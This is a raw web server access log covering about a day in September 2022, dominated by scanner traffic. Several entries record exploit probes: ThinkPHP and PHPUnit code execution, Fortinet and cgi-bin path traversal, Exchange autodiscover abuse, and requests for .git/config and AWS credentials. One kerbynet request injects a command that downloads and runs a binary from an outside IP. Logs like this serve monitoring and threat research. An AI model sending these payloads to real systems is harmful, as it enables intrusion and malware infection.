[12/Sep/2022:03:17:58 +0200] 23.251.102.74 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:04:13:01 +0200] 74.82.47.5 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[12/Sep/2022:04:21:34 +0200] 74.82.47.5 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 309
[12/Sep/2022:04:26:52 +0200] 74.82.47.37 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:04:41:05 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:04:45:08 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[12/Sep/2022:05:15:48 +0200] 92.118.39.86 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:05:32:53 +0200] 192.241.217.165 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[12/Sep/2022:05:39:41 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 390
[12/Sep/2022:05:40:09 +0200] 193.106.29.122 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[12/Sep/2022:06:57:35 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 327
[12/Sep/2022:07:13:21 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "POST /mifs/.;/services/LogService HTTP/1.1" 318
[12/Sep/2022:07:31:58 +0200] 92.255.85.183 - - "-" -
[12/Sep/2022:07:46:20 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET /console/ HTTP/1.1" 307
[12/Sep/2022:08:26:28 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 315
[12/Sep/2022:09:13:36 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET /_ignition/execute-solution HTTP/1.1" 319
[12/Sep/2022:09:15:40 +0200] 192.241.219.168 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:09:23:52 +0200] 128.14.141.34 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:09:56:56 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:10:10:39 +0200] 192.241.208.55 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[12/Sep/2022:10:13:48 +0200] 192.241.209.41 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[12/Sep/2022:10:16:03 +0200] 192.241.208.175 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[12/Sep/2022:10:18:05 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[12/Sep/2022:10:18:14 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[12/Sep/2022:10:18:15 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[12/Sep/2022:10:18:15 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[12/Sep/2022:10:18:20 +0200] 185.142.236.41 TLSv1.2 AES256-SHA "quit" 379
[12/Sep/2022:10:18:21 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393
[12/Sep/2022:10:18:22 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394
[12/Sep/2022:10:18:23 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407
[12/Sep/2022:10:18:25 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309
[12/Sep/2022:10:18:26 +0200] 185.142.236.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[12/Sep/2022:10:21:16 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:11:02:41 +0200] 128.14.133.58 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:11:19:35 +0200] 88.214.43.118 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.aws/credentials.php HTTP/1.1" 320
[12/Sep/2022:11:19:36 +0200] 88.214.43.118 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.aws/credentials.php HTTP/1.1" 320
[12/Sep/2022:11:28:06 +0200] 185.220.100.241 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:11:46:17 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:12:23:59 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "-" -
[12/Sep/2022:12:33:06 +0200] 165.22.229.152 TLSv1.2 AES256-SHA "GET /ab2g HTTP/1.1" 304
[12/Sep/2022:12:33:09 +0200] 165.22.229.152 TLSv1.2 AES256-SHA "GET /ab2h HTTP/1.1" 304
[12/Sep/2022:12:33:53 +0200] 71.6.232.8 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:13:26:06 +0200] 152.89.196.23 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 452
[12/Sep/2022:14:20:31 +0200] 218.145.61.20 - - "-" -
[12/Sep/2022:15:03:21 +0200] 92.118.39.86 TLSv1.2 AES256-SHA "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Acd+%2Ftmp%3Bwget+http%3A%2F%2F198.98.49.79%2Fdeathtrump.i686%3Bchmod+777+deathtrump.i686%3B.%2Fdeathtrump.i686%0A' HTTP/1.1" 424
[12/Sep/2022:15:08:06 +0200] 152.32.143.177 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[12/Sep/2022:17:53:23 +0200] 128.14.209.162 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:18:36:13 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:19:04:45 +0200] 43.205.95.5 TLSv1.2 AES256-SHA "GET /.git/config HTTP/1.1" 310
[12/Sep/2022:19:35:48 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 390
[12/Sep/2022:19:48:00 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 327
[12/Sep/2022:20:41:34 +0200] 20.92.162.191 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.git/config HTTP/1.1" 310
[12/Sep/2022:21:00:55 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 315
[12/Sep/2022:21:01:27 +0200] 193.235.141.177 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[12/Sep/2022:21:02:51 +0200] 51.171.238.35 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[12/Sep/2022:21:13:51 +0200] 128.1.248.42 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:21:15:58 +0200] 185.180.143.7 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:21:28:20 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:22:03:22 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 293
[12/Sep/2022:22:23:13 +0200] 203.122.46.42 - - "-" -
[12/Sep/2022:22:26:59 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[12/Sep/2022:22:30:55 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET /actuator/gateway/routes HTTP/1.1" 315
[12/Sep/2022:23:11:22 +0200] 35.87.112.32 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[12/Sep/2022:23:11:57 +0200] 54.188.158.76 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 314
[12/Sep/2022:23:12:02 +0200] 54.188.158.76 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[12/Sep/2022:23:52:00 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 343
[12/Sep/2022:23:52:04 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 343
[12/Sep/2022:23:52:06 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "POST /dns-query HTTP/1.1" 308
[12/Sep/2022:23:52:08 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "POST /dns-query HTTP/1.1" 308
[12/Sep/2022:23:52:11 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "GET /query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 340
[12/Sep/2022:23:52:13 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "GET /query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 340
[12/Sep/2022:23:52:15 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "POST /query HTTP/1.1" 305
[12/Sep/2022:23:52:18 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "POST /query HTTP/1.1" 305
[12/Sep/2022:23:52:20 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "GET /resolve?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 342
[12/Sep/2022:23:52:22 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "GET /resolve?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 342
[12/Sep/2022:23:52:25 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "POST /resolve HTTP/1.1" 305
[12/Sep/2022:23:52:28 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "POST /resolve HTTP/1.1" 305
[12/Sep/2022:23:52:29 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "GET /?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 337
[12/Sep/2022:23:52:32 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "GET /?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 337
[12/Sep/2022:23:52:34 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "POST / HTTP/1.1" 301
[12/Sep/2022:23:52:36 +0200] 47.243.233.244 TLSv1.2 AES256-SHA "POST / HTTP/1.1" 301
[12/Sep/2022:23:57:48 +0200] 205.210.31.23 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377
[13/Sep/2022:00:19:06 +0200] 69.146.0.194 TLSv1.2 AES256-SHA "GET /autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3f@foo.com HTTP/1.1" 353
[13/Sep/2022:00:23:13 +0200] 128.14.209.162 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[13/Sep/2022:00:49:53 +0200] 34.76.96.55 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[13/Sep/2022:01:06:51 +0200] 94.102.61.8 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301